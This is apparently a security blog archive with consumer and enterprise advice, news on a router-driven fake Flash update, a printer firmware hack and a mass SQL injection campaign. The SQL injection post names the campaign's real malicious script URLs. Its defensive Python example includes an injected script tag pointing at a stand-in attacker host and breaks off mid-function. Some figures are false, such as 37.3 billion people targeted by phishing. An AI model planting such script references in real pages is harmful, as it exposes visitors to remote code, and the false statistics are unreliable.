
Monday, April 21, 2014

WARNING! Your Flash Player may be out of date.

Adobe Flash Malware driven by infected "Router" The Moon Malware

A few days ago, I started to receive the pop-up message "WARNING! Your Flash Player may be out of date. Please update to continue." when I was trying to access websites like Facebook, YouTube, Google, etc.

If you're receiving a similar message, then continue reading, but make sure you don't click on anything or try to update Flash Player from the pop-up window. You can check your current version of Adobe Flash Player by visiting Adobe's official website. If you're using the Google Chrome browser, it already includes Adobe Flash Player built in, and Chrome updates automatically when new versions of Flash Player are available.

You will also notice that the same message is popping up on all the devices connected to the same router (mobile phones, laptops, etc.).



Now even the dumbest person should know it is not coming from the computer but from the network, which means your router is infected. It's commonly happening with Linksys, Asus and a few other manufacturers.

How to fix this?

  • Reset your router (by holding down the reset button on the underside of the router for 6 seconds). Note that after the reset all your ISP settings will be lost.
  • Configure your router again with the ISP settings (username and password are also required).
  • Clear your browser's cache, and the pop-up message will not appear again.
Refer here for some basic tips on hardening your router to avoid such things happening again.

Wednesday, July 31, 2013

The Biggest Threat To Enterprise Is The Thumb Drive

How were Iranian nuclear facilities destroyed? With a thumb drive. And how did Snowden allegedly smuggle out the blueprints to the NSA? With a thumb drive.

No, it wasn't by some ultra secretive means of super-complex cyber code writing and cloud encryption by which good ol' Eddy breached America's security in arguably the most secure compound on the planet — nope — he simply walked in with a thumb drive, downloaded the NSA, and walked out.

Carl Weinschenk of IT Business Times breaks down how bad a threat flash drives can be:
The U.S. Department of Homeland Security ran a test in which staffers dropped flash drives in the parking lot of government and contractor buildings. Sixty percent of folks who picked them up simply plugged them into networked computers. That percentage jumped to 90 percent if the drive had an official logo.
The Washington Times breaks down the threat further by reminding everyone that a "number of commercially available programs can switch off the USB port of every computer on the network."

NSA officials “were laying down on their job if they didn’t disable the USB port,” an unnamed government IT specialist told the Washington Times, referring to the small socket on the side of a computer where thumb drives are plugged in.

Organizations, whether they're public or private, have had difficulty enforcing Bring Your Own Device security measures now for a number of years. Certainly there are places in government buildings where there are NO recording devices or storage devices allowed under ANY circumstances.

Regardless, Snowden managed to get one in and get one out.

Friday, July 26, 2013

Beware of Gumtree Scam: Scammer Targeted More Than 300 People on the Gumtree

Reports have emerged of a series of similar scams on Gumtree affecting people across Australia.

A male scam artist searches the wanted advertisements on the site and then contacts the poster to say he has the item they are seeking.

The man then asks where the buyer lives and states he also lives nearby, but is working interstate so is unable to drop the goods off in person. Once the money is transferred to his account he ceases contact.

The scams have involved the attempted purchase of goods including mobile phones, iPads, electronic tablets and gift cards from stores including Coles, Myer and JB Hifi.

Reports of online scams can be made to the Australian Competition and Consumer Commission via www.scamwatch.gov.au or your specific country scamwatch website.

Saturday, July 20, 2013

Cyber Threats: Trends in Phishing and Spear Phishing

Phishing is a global problem for businesses as well as individuals, targeting 37.3 billion people globally in the past year

Most of us have wised up to basic scams and know better than to accept a Nigerian prince's offer of money, or a miraculous win on a Spanish lottery that you can't quite remember entering. But cyber criminals are raising their game and have evolved their tactics to target the more cyber-aware for greater returns.

Sophisticated 'spear phishing' attacks can be hard even for experts to spot; even the largest organisations are not immune. What chance does that leave the average company or employee, let alone those who use computers infrequently?

Spear phishing is not random – cyber criminals identify employees within a target organisation and use social engineering tactics to construct a legitimate-looking email. The FBI has warned businesses to be more aware of spear phishing tactics, as hackers target employees with administrative rights or access to critical systems.

91% of APTs (advanced persistent threats) start with phishing attacks and success could give cyber criminals the 'keys' to bypass security and initiate further attacks. Clicking a link doesn't mean that you are immediately compromised; phishing is part of a larger attack.

Hackers need to expose a system vulnerability and be able to install software quickly and quietly. However, cyber criminals use advanced tactics to disguise malicious attachments and sites to trick users into further action.

This infographic by Via Resource highlights trends and targets in phishing attacks.



Thursday, March 28, 2013

Hackers steal photos, turn Wi-Fi cameras into remote surveillance device

Electronic manufacturers need to start putting some real thought into securing the devices and protecting privacy!

With so many people seizing the convenience of using their smartphone cameras to point, shoot and share, embedded GPS location and all, digital camera manufacturers have been offering more "social" options such as built-in Wi-Fi capabilities and camera apps to quickly share photos and videos.

In fact, if a digital single-lens reflex (DSLR) camera isn't Wi-Fi enabled, some photographers go the Wi-Fi SD card route and others create hacks to give that camera wireless file transfer capabilities.

While there have been plenty of researchers working on ways to exploit smartphones for remote spying, such as the scary PlaceRaider, an Android app that remotely exploits the camera and secretly snaps a picture every two seconds, there has not been as much research into exploiting DSLR Wi-Fi-enabled cameras. However, security researchers from ERNW changed that by showing how to exploit vulnerabilities in order to steal photos and turn a DSLR camera into a spying device.

In the presentation Paparazzi over IP, Mende and Turbing explained that there are four ways that the Canon EOS-1D X can communicate with a network via FTP, DLNA (Digital Living Network Alliance), WFT (Wireless File Transmitter) and the EOS Utility Mode.

They were able to attack and exploit all four, saying, "Not only did we discover weak plaintext protocols used in the communication, we've also been able to gain complete control of the camera, including modification of camera settings, file transfer and image live stream. So in the end the 'upload to the clouds' feature resulted in an image stealing Man-in-the-Imageflow."

 

Refer here to read further details.

Saturday, March 9, 2013

Are Personal Password Database Sites Safe & Secure?

Basic tips & techniques for your daily password management!

Earlier this month, there was an expert on a popular U.S. morning news show advising people to use personal password database sites to keep track of their passwords. I couldn't disagree more.

While I commend the expert for advising people to use multiple, diverse and difficult-to-guess passwords for their different online accounts, I do not believe storing these passwords in the cloud is the best idea.

Here are four password-keeper services I saw recently being promoted for use within this Payment Systems post. Here are my thoughts on each of the four: 

KeePass: If you want to use this service, use it with a USB instead of Dropbox, which has had some security breaches in the past year. Although Dropbox recently announced improved security, I still don't want to entrust my passwords to a cloud service of any kind (Keep in mind lots of folks working for the cloud service have access to the info, simply as a matter of supporting the service.)

1Password: I'm leery. If someone else gets my computer, will the service's web integration allow them to access all my accounts? I pass on 1Password. 

LastPass and RoboForm: Many security folks approve of LastPass and RoboForm. Indeed, the services have been around for a few years. But I do not like the lack of information about how they secure their sites. I would not use these services, as they are cloud-based, and I simply do not want to share my passwords with others in this way. If you want to use them for managing the passwords for your websites with non-sensitive information, that's an option. However, keep your banking and other financial passwords with you and don't share with an online site.

It continues to be important to have multiple and varied passwords. At a minimum, your social networking passwords should be vastly different from your financial and banking passwords.

As for how to keep a record of these sites, if you don't want to use a password management service like KeePass to store your passwords on your own devices, try an encrypted Excel file, or even a good old-fashioned notebook that you keep locked away.

These alternatives may not be high-tech, but given the vulnerabilities of cloud-based password management sites, they are much safer right now than relying on cloud-based services, which are major targets for hackers.

Sunday, September 16, 2012

Techniques to Protect Yourself on Social Networks

Security tips from ISACA Journal

Vigilance remains the foundation of the security, and thus the privacy, of personal information. It can be broken down into a few techniques that are simple but could make all the difference:

Choice of “friends” and contacts—Users should be extremely careful in their choice of friends on these networks. It is common practice to accept contact from friends of friends who are frequently complete strangers. This can lead to one’s private life being exposed to potentially harmful individuals.

Restricting private content to close friends and family only—Social networking sites are increasingly allowing their users to configure restrictions on access to their information. It is, therefore, important to use these restrictions and to ensure that they are properly configured, given that our information is public by default.

Careful choice of information to be broadcast—The key to the protection of privacy is, in fact, what information one broadcasts. Name, surname, date of birth, place of birth, photos, videos, comments and opinions should be carefully screened prior to being posted. Keep in mind that information posted on a network may one day be used against its author.

Awareness—Every sector of the population should be made aware of the need to protect themselves against the risk that the use of social networks may entail. In the business world, this awareness must form part of the IT security program.

Finally, social networks are a great way to express oneself and share with others. They help users lift the barriers of space and time and communicate with the world. However, there is another side to them: the proven danger of user privacy violation.

These dangers are even more of a threat now thanks to the increasingly widespread trend of registering on several sites using a single user account. In response to this situation, each Internet user must remain vigilant and governments must put more pressure on the operators of these sites to safeguard the security of Internet users.

Read Guy-Hermann Ngambeket Ndiandukue’s full article, “Social Networks and Privacy—Threats and Protection,” in the current issue of the ISACA Journal, in which you will also find additional coverage of timely and relevant issues affecting the ISACA professional communities.

Thursday, August 2, 2012

How to Spot a Fake LinkedIn Profile

Scams on LinkedIn exposed: how gullible job-seekers are beguiled!


LinkedIn is no stranger to fraud, having recently survived a heavily scrutinized password breach.


Unfortunately, it's largely up to you to protect yourself from falling into the snare of a scam artist posing as a legitimate professional connection. Understand that once you are linked with a fraudster, there is no telling what type of scams they will try to pull on you.


They may also victimize your other connections if you allow your linked connections to see one another (you can change your settings to prevent this). Because some LinkedIn users are in the practice of accepting all invitations, it's incredibly important to look out for scammers.


John Thomas of Bloglerati has put together an excellent collection of fake profiles on his Facebook page, along with the following red flags for spotting fake LinkedIn profiles:

  • Lower case first and last name
  • Stock photo for profile picture
  • Minimal info in profile
  • Belongs to a large number of groups
  • Generic company name
  • Rhythmic names, like Sam Smith or Joe Johnson

Tuesday, July 17, 2012

An easy way to defeat a “Keylogger”

How to defeat a "Keylogger" without any software/hardware


There are several ways to defeat a keylogger. Here is an easy way which does not need any software or hardware. It is not revolutionary, but it is quite a useful technique.


Some of you may already be practicing the same. Keyloggers and Trojans can steal your passwords, credit card details or other important information while you type them on your system. We are sometimes bound to use third-party systems, or even our own systems may be compromised (which we may not be aware of).


How do we defeat a "Keylogger"?


Let’s assume your password is “savemefromkeyloggers”.


When you type the password, you need to ensure that you type it in a different, obfuscated order. Here is an explanation through an example.


Step 1: Type “veme”


Step 2: Use your mouse pointer to bring the cursor just before “veme” and type “sa”. So what you see is “saveme”, but the keylogger log would read “vemesa”.


Step 3: Use your mouse pointer to bring the cursor just after “saveme” and type “ggers”. So what you see is “savemeggers”, but the keylogger log would read “vemesaggers”.


Step 4: Use your mouse pointer to bring the cursor just before “ggers” and type “fromkeylo”.


So what you see is “savemefromkeyloggers”, but the keylogger log would read “vemesaggersfromkeylo”.


Please note that you should not use the arrow keys to move the cursor, since arrow-key presses are keystrokes too and would be logged. Use the mouse to click at the right place so that the password keystrokes are jumbled up and the keylogger owner will not be able to work out your real password.


So you can create your own method to jumble up/obfuscate your credit card number, CVV, passwords or anything else that is critical.


It is good practice to always use the same pattern to obfuscate the same data, since that makes it more difficult for anybody to decode the real password from a single sample of the obfuscated password.


It becomes easier to decode when there are several samples of different obfuscated forms of the same password. This technique is quite useful if you are using a shared computer, such as in a cyber cafe.
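The four steps above, and the general rule behind them, as an added Python model that is not part of the original post: a text field whose cursor is moved only by mouse clicks, so a keystroke-only logger records the fragments in typing order while the screen shows the real password. `TextField`, `post_example` and `planned_entry` are names chosen here; the sample secret is the post's own example.

```python
from __future__ import annotations

from dataclasses import dataclass


@dataclass
class TextField:
    """Password box as the post describes it: mouse clicks move the
    cursor without generating keystrokes, so only typed characters
    reach a keystroke-only logger (modelled by the `keylog` string)."""
    shown: str = ""    # characters on screen, in visual order
    keylog: str = ""   # characters in the order they were typed
    cursor: int = 0

    def click_at(self, pos: int) -> None:
        """Mouse click placing the cursor just before character `pos`."""
        if not 0 <= pos <= len(self.shown):
            raise ValueError("click outside the field")
        self.cursor = pos

    def type_text(self, fragment: str) -> None:
        """Type `fragment` at the cursor; the logger sees it verbatim."""
        self.shown = self.shown[:self.cursor] + fragment + self.shown[self.cursor:]
        self.cursor += len(fragment)
        self.keylog += fragment


def post_example() -> tuple[str, str]:
    """The post's four steps for 'savemefromkeyloggers'.
    Returns (what the screen shows, what the logger captured)."""
    f = TextField()
    f.type_text("veme")                       # step 1
    f.click_at(0); f.type_text("sa")          # step 2: screen 'saveme', log 'vemesa'
    f.click_at(6); f.type_text("ggers")       # step 3: click just after 'saveme'
    f.click_at(6); f.type_text("fromkeylo")   # step 4: click just before 'ggers'
    return f.shown, f.keylog


def planned_entry(secret: str, plan: list[tuple[int, int]]) -> tuple[str, str]:
    """General form of the trick. `plan` lists (start, end) slices of
    `secret` in the order they are typed; each slice is clicked into the
    spot where it belongs among the slices already on screen. The slices
    must tile the secret exactly, otherwise the screen would not end up
    showing the real secret."""
    pos = 0
    for start, end in sorted(plan):
        if start != pos or end <= start:
            raise ValueError("plan must cover the secret without gaps or overlaps")
        pos = end
    if pos != len(secret):
        raise ValueError("plan does not cover the whole secret")

    field = TextField()
    typed: list[tuple[int, int]] = []
    for start, end in plan:
        # Every slice already typed that belongs to the left of this one is
        # on screen before it, so the click lands just after those slices.
        field.click_at(sum(e - s for s, e in typed if s < start))
        field.type_text(secret[start:end])
        typed.append((start, end))
    return field.shown, field.keylog


if __name__ == "__main__":
    shown, log = post_example()
    print(f"screen: {shown}")
    print(f"logger: {log}")
```

A logger that also records mouse-click positions or takes screenshots can put the fragments back in order, so this only defeats the keystroke-only loggers the post has in mind.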

Thursday, July 12, 2012

10 Crazy IT Security Tricks That Actually Work

IT security threats are constantly evolving. It's time for IT security pros to get ingenious


Network and endpoint security may not strike you as the first place to scratch an experimental itch. After all, protecting the company's systems and data should call into question any action that may introduce risk.


But IT security threats constantly evolve, and sometimes you have to think outside the box to keep ahead of the more ingenious evildoers. And sometimes you have to get a little crazy.


Here are 10 security ideas that have been -- and in many cases still are -- shunned as too offbeat to work but that function quite effectively in helping secure the company's IT assets.


The companies employing these methods don't care about arguing or placating the naysayers. They see the results and know these methods work, and they work well.


Innovative security technique No. 1: Renaming admins


Renaming privileged accounts to something less obvious than "administrator" is often slammed as a wasteful, "security by obscurity" defense. However, this simple security strategy works. If the attacker hasn't already made it inside your network or host, there's little reason to believe they'll be able to readily discern the new names for your privileged accounts.


If they don't know the names, they can't mount a successful password-guessing campaign against them. Even bigger bonus? Never in the history of automated malware -- the campaigns usually mounted against workstations and servers -- has an attack attempted to use anything but built-in account names. By renaming your privileged accounts, you defeat hackers and malware in one step. Plus, it's easier to monitor and alert on log-on attempts to the original privileged account names when they're no longer in use.
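Technique No. 1 ends with the monitoring point: once the real accounts are renamed, any logon attempt naming the old built-in accounts is suspicious. As an added example, not from the InfoWorld article, here is that alerting logic in Python over a few constructed log lines; the key=value line format, the `DECOY_NAMES` list and the threshold are assumptions, not a real Windows event format.

```python
from __future__ import annotations

from collections import Counter

# Built-in names that should no longer be used once the real accounts are
# renamed; any attempt against them is a decoy hit (assumed list).
DECOY_NAMES = {"administrator", "admin", "root", "domain admin"}

# Constructed sample log in a simplified key=value form (not real
# Windows Security log output). Three failed attempts against the
# retired "Administrator" name, normal user activity, then a successful
# logon as "root" on a Linux host where that name should be disabled.
SAMPLE_LOG = """\
ts=2012-07-12T03:14:05Z event=logon_failed user=Administrator src=10.0.5.23 host=FS01
ts=2012-07-12T03:14:06Z event=logon_failed user=Administrator src=10.0.5.23 host=FS01
ts=2012-07-12T03:14:07Z event=logon_failed user=Administrator src=10.0.5.23 host=FS01
ts=2012-07-12T03:15:10Z event=logon_ok user=svc-backup src=10.0.1.4 host=FS01
ts=2012-07-12T08:02:44Z event=logon_failed user=jsmith src=10.0.7.9 host=WS17
ts=2012-07-12T08:03:01Z event=logon_ok user=jsmith src=10.0.7.9 host=WS17
ts=2012-07-12T09:41:22Z event=logon_ok user=root src=10.0.5.23 host=LNX02
"""


def parse_line(line: str) -> dict[str, str]:
    """Split one 'k=v k=v ...' line into a dict."""
    return dict(tok.split("=", 1) for tok in line.split())


def decoy_hits(log_text: str) -> list[dict[str, str]]:
    """Every attempt, successful or not, that names a retired built-in account."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec.get("user", "").lower() in DECOY_NAMES:
            hits.append(rec)
    return hits


def alerts(log_text: str, threshold: int = 3) -> list[str]:
    """Raise one alert per (source, host) once failed decoy-name attempts
    reach `threshold`, and an immediate critical alert for any successful
    logon as a decoy name: that account is not supposed to exist, so a
    success means the rename was not done or the host is already owned."""
    counts: Counter[tuple[str, str]] = Counter()
    out: list[str] = []
    for rec in decoy_hits(log_text):
        key = (rec["src"], rec["host"])
        if rec["event"] == "logon_ok":
            out.append(f"CRITICAL: successful logon as retired account "
                       f"{rec['user']!r} on {rec['host']} from {rec['src']}")
            continue
        counts[key] += 1
        if counts[key] == threshold:
            out.append(f"ALERT: {threshold} attempts against retired account "
                       f"names on {rec['host']} from {rec['src']}")
    return out


if __name__ == "__main__":
    for line in alerts(SAMPLE_LOG):
        print(line)
```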


Innovative security technique No. 2: Getting rid of admins


Another recommendation is to get rid of all wholesale privileged accounts: administrator, domain admin, enterprise admin, and every other account and group that has built-in, widespread, privileged permissions by default.


True, Windows still allows you to create an alternate Administrator account, but today's most aggressive computer security defenders recommend getting rid of all built-in privileged accounts, at least full-time. Still, many network admins see this as going a step too far, an overly draconian measure that won't work. Well, at least one Fortune 100 company has eliminated all built-in privileged accounts, and it's working great.


The company presents no evidence of having been compromised by an APT (advanced persistent threat). And nobody is complaining about the lack of privileged access, either on the user side or from IT. Why would they? They aren't getting hacked.


Innovative security technique No. 3: Honeypots


Modern computer honeypots have been around since the days of Clifford Stoll's "The Cuckoo's Egg," and they still aren't as respected or as widely adopted as they deserve. A honeypot is any computer asset that is set up solely to be attacked. Honeypots have no production value.


They sit and wait, and they are monitored. When a hacker or malware touches them, they send an alert to an admin so that the touch can be investigated. They provide low noise and high value. The shops that use honeypots get notified quickly of active attacks. In fact, nothing beats a honeypot for early warning -- except for a bunch of honeypots, called a honeynet.


Innovative security technique No. 4: Using nondefault ports


Another technique for minimizing security risk is to install services on nondefault ports. Like renaming privileged accounts, this security-by-obscurity tactic goes gangbusters. When zero-day, remote buffer overflow threats become weaponized by worms, computer viruses, and so on, they always -- and only -- go for the default ports.


This is the case for SQL injection surfers, HTTP worms, SSH discoverers, and anything else that probes a commonly advertised remote port. Recently Symantec's pcAnywhere and Microsoft's Remote Desktop Protocol suffered remote exploits. When these exploits became weaponized, it was a race against the clock for defenders to apply patches or block the ports before the worms could arrive. If either service had been running on a nondefault port, the race wouldn't even begin.


That's because in the history of automated malware, malware has only ever tried the default port.


Innovative security technique No. 5: Installing to custom directories


Another security-by-obscurity defense is to install applications to nondefault directories. This one doesn't work as well as it used to, given that most attacks happen at the application file level today, but it still has value.


Like the previous security-by-obscurity recommendations, installing applications to custom directories reduces risk -- automated malware almost never looks anywhere but the default directories. If malware is able to exploit your system or application, it will try to manipulate the system or application by looking for default directories. Install your OS or application to a nonstandard directory and you screw up its coding.


Changing default folders doesn't have as much bang for the buck as the other techniques mentioned here, but it fools a ton of malware, and that means reduced risk.


Innovative security technique No. 6: Tarpits 


Today, many networks (and honeypots) have tarpit functionality, which answers any invalid connection attempt. The only downside: tarpits can cause problems with legitimate services if the tarpit answers prematurely because the legitimate server responded slowly. Remember to fine-tune the tarpit to avoid these false positives and enjoy the benefits.


Innovative security technique No. 7: Network traffic flow analysis


With foreign hackers abounding, one of the best ways to discover massive data theft is through network traffic flow analysis. Free and commercial software is available to map your network flows and establish baselines for what should be going where. That way, if you see hundreds of gigabytes of data suddenly and unexpectedly heading offshore, you can investigate.


Most of the APT attacks I've investigated would have been recognized months earlier if the victim had an idea of what data should have been going where and when.


Innovative security technique No. 8: Screensavers


Password-protected screensavers are a simple technique for minimizing security risk. If the computing device is idle for too long, a screensaver requiring a password kicks in. Long criticized by users who considered them nuisances to their legitimate work, they're now a staple on every computing device, from laptops to slates to mobile phones.


Innovative security technique No. 9: Disabling Internet browsing on servers


Most computer risk is incurred by users' actions on the Internet. Organizations that disable Internet browsing, or all Internet access, on servers that don't need the connection significantly reduce that server's exposure to malicious activity. You don't want bored admins picking up their email and posting to social networking sites while they're waiting for a patch to download.


Instead, block what isn't needed. For companies using Windows servers, consider disabling UAC (User Account Control) because the risk to the desktop that UAC minimizes isn't there. UAC can cause some security issues, so disabling it while maintaining strong security is a boon for many organizations.


Innovative security technique No. 10: Security-minded development


Any organization producing custom code should integrate security practices into its development process -- ensuring that code security will be reviewed and built in from day one in any coding project. Doing so absolutely will reduce the risk of exploitation in your environment.


This practice, sometimes known as SDL (Security Development Lifecycle), differs from educator to educator, but often includes the following tenets: use of secure programming languages; avoidance of knowingly insecure programming functions; code review; penetration testing; and a laundry list of other best practices aimed at reducing the likelihood of producing security bug-ridden code.


Microsoft, for one, has been able to significantly reduce the number of security bugs in every shipping product since instituting SDL. It offers lessons learned, free tools, and guidance at its SDL website.


This story, "10 crazy IT security tricks that actually work," was originally published at InfoWorld.com.

Friday, July 6, 2012

Why Business Continuity is Critical For Your Business?

4 Tips to Gain Upper Management Attention


Companies often make many strategic decisions such as outsourcing, off-shoring and long supply chains without full consideration of the consequence of business interruption.


They primarily focus on adding short-term value to the bottom line, but when these strategies fail to deliver, reputation and brand image are compromised. Short-term financial losses might be containable, but long-term loss of market share is often much more damaging.


By implementing effective business continuity plans, businesses can increase their recovery capabilities dramatically. And that means they can make the right decisions quickly, cut downtime and minimize financial losses. So, getting buy-in at the top is crucial. It requires professionals to have better understanding of the concerns of top management and an ability to communicate risk issues in a common language.


Here are a few ways business continuity practitioners can seek upper management attention.


Emphasize business consequences: Many leaders were shaken by the corporate impact that the Gulf of Mexico oil spill incident had on the finances, share-price and reputation of British Petroleum.


Business continuity managers need to bring these real-life cases in their presentation to management and further use their skills to identify their own organization's potential high consequence events. 


Implement innovative tests and exercises: A traditional difficulty is that BCM practitioners do not report at a high enough level to affect decisions. Although often true, they are not without influence, and one way to use it is in developing an innovative testing and exercising program.


In the past, too many exercises have concentrated on evacuation, safety and emergency response. Although these are required, top management employs specific specialists to handle safety and security on their behalf. 


What BC practitioners need to do is choose scenarios and techniques in their exercises that really interest the leadership team. Using scenarios that highlight fundamental business threats and challenging top management to respond can be scary, but it also can raise the profile of BCM rapidly.


Techniques such as war games, stress testing, scenario planning and horizon scanning are becoming important to business continuity tests. These are areas in which the BCM professional could and (in the future) really should take a leading role.


Be more assertive: BCM professionals can get top level attention by taking a more assertive position to organizational change. Clearly, there are limits to which individuals can become involved in strategic decisions, but by producing a well considered analysis of the consequences of change, they can often get senior management interest.


Decisions can be reviewed or modified if consequential risks are better articulated. BCM professionals can do this through a risk management organizational framework and can make their voice heard.


Communicate BCM benefits: Practitioners must concentrate on finding value and benefits for BCM and promoting them.


For example, if having proper BCM in place helps the organization get on the approved supplier list for a major customer, it's the BC professional's job to ensure that everyone knows about it. If it were a key deciding factor that actually won a big contract, make sure that sales, marketing and finance recognize and publicize that fact.


If BCM helps procurement eliminate high-risk suppliers, again, getting that message out through whatever communication vehicles are available is key.

Tuesday, April 17, 2012

Ernst & Young: Attacking the smart grid

Penetration testing techniques for industrial control systems and advanced metering infrastructure


The industrial control systems that provide automation for critical infrastructure have recently come under increased scrutiny, and the need to protect current infrastructure as well as integrate security into new system design is now a top priority. Penetration testing has become the latest trend in the ICS space; however, the cultural and technological differences between control systems and traditional IT systems have caused confusion around how to perform a penetration test safely and effectively. 


In this briefing, we will discuss the changing landscape in control system architecture, with special attention paid to smart grid infrastructure, and highlight the implications for security. A description of the lifecycle of a penetration test is followed by a breakdown of a typical ICS infrastructure. Specific penetration testing activities are explained for each component to provide insight for control system engineers and management into how penetration testing can benefit their organization.


Refer here to download the whitepaper.

Sunday, January 15, 2012

Signcryption: New Technology & Standard to improve Cyber Security

Signcryption is a technology that protects confidentiality and authenticity, seamlessly and simultaneously

For example, when you log in to your online bank account, signcryption prevents your username and password from being seen by unauthorized individuals. At the same time, it confirms your identity for the bank.

UNC Charlotte professor Yuliang Zheng invented the revolutionary new technology and he continues his research in the College of Computing and Informatics. After a nearly three-year process, his research efforts have been formally recognized as an international standard by the International Organization for Standardization (ISO).

News of the ISO adoption comes amidst daily reports of cyber attack and cyber crime around the world. Zheng says the application will also enhance the security and privacy of cloud computing.

“The adoption of signcryption as an international standard is significant in several ways,” he said. “It will now be the standard worldwide for protecting confidentiality and authenticity during transmissions of digital information.”

“This will also allow smaller devices, such as smartphones and PDAs, 3G and 4G mobile communications, as well as emerging technologies, such as radio frequency identifiers (RFID) and wireless sensor networks, to perform high-level security functions,” Zheng said.

“And, by performing these two functions simultaneously, we can save resources, be it an individual’s time or be it energy, as it will take less time to perform the task.”

Tuesday, December 27, 2011

DDoS Testing Methodology

A methodology to measure the resiliency of network infrastructure against DDoS and botnet attacks

Distributed denial of service (DDoS) attacks are rampant, successfully targeting Fortune 100 businesses, not to mention government, news media, communication and financial networks throughout the world. It has become more important to assess network equipment and application servers using these same attacks. Only through realistic attack simulation can organizations visualize their own weaknesses and vulnerabilities within the IT infrastructure and how resilient these elements are when under attack.

DDoS Testing Methodology

BreakingPoint has created a definitive DDoS testing methodology that creates a variety of attacks to help users find their network weaknesses before others do. Such attacks include the following:
  • DDoS designed to consume all available bandwidth, all disk space or all available CPU cycles
  • DDoS designed to disrupt important information flow such as routing tables by injecting false routes, thus causing packets to be misrouted
  • DDoS designed to break the physical layer of the network and obstruct the communication between the end-point and the user
  • Botnets designed to send large quantities of unsolicited e-mail to trigger Delivery Status Notifications (bounce messages) to spoofed originating email addresses

To download the methodology please refer here (registration may be required).

Friday, December 16, 2011

What does it really take to exploit a printer?

Printer Hack: Researchers Can Set Media’s Pants on Fire

In the past couple of weeks, there has been quite a bit of press and blogging about a security vulnerability in HP printers that was discovered by researchers in the Intrusion Detection Lab at Columbia University.

In a nutshell, the researchers found a way to replace the operating firmware on an HP printer with firmware of their own design that can do bad things, and they also found a way to do it to a printer that is on a private network behind a firewall.

MSNBC ran an “exclusive” story about it calling it a “devastating attack” to which “millions of printers” could be subjected. Its lede suggested that hackers could cause the printer to catch fire, or be used for identity theft, or be used to take control of entire networks.

In practice, this isn’t an easy vulnerability to exploit on a large scale.

Let me explain:

First, you need to target a printer that supports PJL and its largely undocumented remote firmware update (RFU) function. Many printers support PJL, but RFU is less commonly supported. Many printers don’t have any mechanism for remote updates, and many others use something other than PJL’s RFU function for remote updates.

Once you've found a printer that supports PJL and its RFU function, you'll need to make sure that it will apply a firmware update without checking its authenticity. I can’t speak for other manufacturers, but my employer’s products have been using digital signature verification for firmware updates for at least the seven-plus years that I have worked for them.

Next, you need to be able to create new firmware to do your bidding. To do that, you need to know the manufacturer and model of your target. The researchers demonstrated exploitation of a victim’s printer that was on a private, firewalled network, but didn’t mention how they determined which make and model of printer would be used by a particular victim. They would need to know that in order to send the correct firmware image to the victim.

And then there is the matter of reverse-engineering printer firmware. It is certainly possible, but not very practical when you consider that there are thousands of different printer models to contend with.

The researchers say that “rewriting the printer’s firmware takes only about 30 seconds”, but they are referring to the time it takes for the printer to update its flash memory and not how long it takes for someone to reverse-engineer a printer to do something malevolently useful.

Next, you need to get the victim to print a document that contains the firmware update code, and of course they need to print it on the printer that you targeted. I don’t know if it is possible to embed an RFU in a printable document in such a way that isn’t obvious when the document is viewed, as most people do before they print something. Perhaps they will disclose that detail at the Chaos conference.

Now, finally, you own the victim’s printer.

Sunday, July 31, 2011

Security Training Video: Investigating DoS Attacks

Introduction to DoS Attacks and techniques

CareerAcademy.com is offering a free EC-Council training video to try out their training delivery platform.

The course offered is on Computer Hacking Forensics Investigator (CHFI): Investigating DoS Attacks, and is intended for IT security professionals. The course outline is below, along with a link to try it out.

Please feel free to forward to others in your organization who may be interested in this type of training.

Link to sign up for the free training course:
http://www.careeracademy.com/download/freeCHFIm31.html

Course Description:

This free introductory online training course (valued at $195) will immerse the student in an interactive environment where they will be shown how to investigate DoS attacks. Students will be introduced to the types of DoS attacks, buffer overflow, DoS attack techniques, intrusion detection systems, live demonstrations of SYN Flooding, Smart Sniff, 3D Trace Routes, and many more critical concepts.

Use the link above to sign up, and for more information, visit www.careeracademy.com or contact CareerAcademy.com at 1-800-807-8839 x201 (US), 1-781-453-3900 x201 (International), email: info@careeracademy.com

This course is Module 31 of a 51 module EC-Council Computer Hacking Forensic Investigator CHFI Training CBT Boot Camp.

Sunday, April 3, 2011

Massive SQL injection attack

Mass Injection hits over 694,000 URLs

Hundreds of thousands of URLs have been compromised—at the time of writing, 694,000—in an enormous and indiscriminate SQL injection attack. The attack has modified text stored in databases, with the result that pages served up by the attacked systems include within each page one or more references to a particular JavaScript file.

The attack appears to be indiscriminate in its targets, with compromised machines running ASP, ASP.NET, ColdFusion, JSP, and PHP, and no doubt others. SQL injection attacks, which exploit badly-written Web applications to directly perform actions against databases, are largely independent of the technology used to develop the applications themselves: the programming errors that allow SQL injection can be made in virtually any language.

The underlying cause is a programmer trusting input that comes from a Web page—either a value from a form, or a parameter in a URL—and passing this input directly into the database. If the input is malformed in a particular way, the result is that the database will run code of the attacker's choosing. In this case, the injected SQL is simply updating text fields within the database, to make them include an extra fragment of HTML. This HTML in turn loads a JavaScript from a remote server, typically "http://lizamoon.com/ur.php" or more recently, "http://alisa-carter.com/ur.php." Both domain names resolve to the same IP address, and presently that server is not functional, leaving browsers unable to load the malicious script when they visit infected pages. Previously, it contained a simple script to redirect users to a fake anti-virus site.
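To make the cause concrete, here is an added example in Python (written for this post, not code from the article or from the campaign it describes). It shows the exact bug the paragraph names, a request parameter pasted straight into SQL, next to the parameterised form that fixes it, and a scan that finds the trace the campaign leaves behind: `<script src>` references in stored text pointing at a host the site never allowed. The table, its rows, the allowlist and the host `attacker.example` are constructed placeholders; the page's real domains are deliberately not used. Because the affected ASP/MSSQL stacks accept several statements in one call and sqlite3 does not, a small helper splits the string to emulate that driver behaviour.

```python
import re
import sqlite3

# Constructed sample rows (not from the page): a tiny CMS table of the kind
# whose text fields this campaign rewrote. Row 3 legitimately loads a script
# from an allowed host so the scan has something it must not flag.
SEED_ROWS = [
    (1, "Welcome", "<p>Hello, world</p>"),
    (2, "About", "<p>About this site</p>"),
    (3, "Contact", '<p>Mail us</p><script src="https://cdn.example.net/app.js"></script>'),
]

# Placeholder host for the injected reference; the campaign's real domains
# are named on the page and intentionally not repeated here.
INJECTED_FRAGMENT = '<script src="http://attacker.example/ur.php"></script>'

# Hosts the site is allowed to load scripts from (an assumption for the scan).
ALLOWED_SCRIPT_HOSTS = {"cdn.example.net"}

SCRIPT_SRC = re.compile(r'<script[^>]*\bsrc=["\']([^"\']+)["\']', re.IGNORECASE)


def make_db():
    """Fresh in-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
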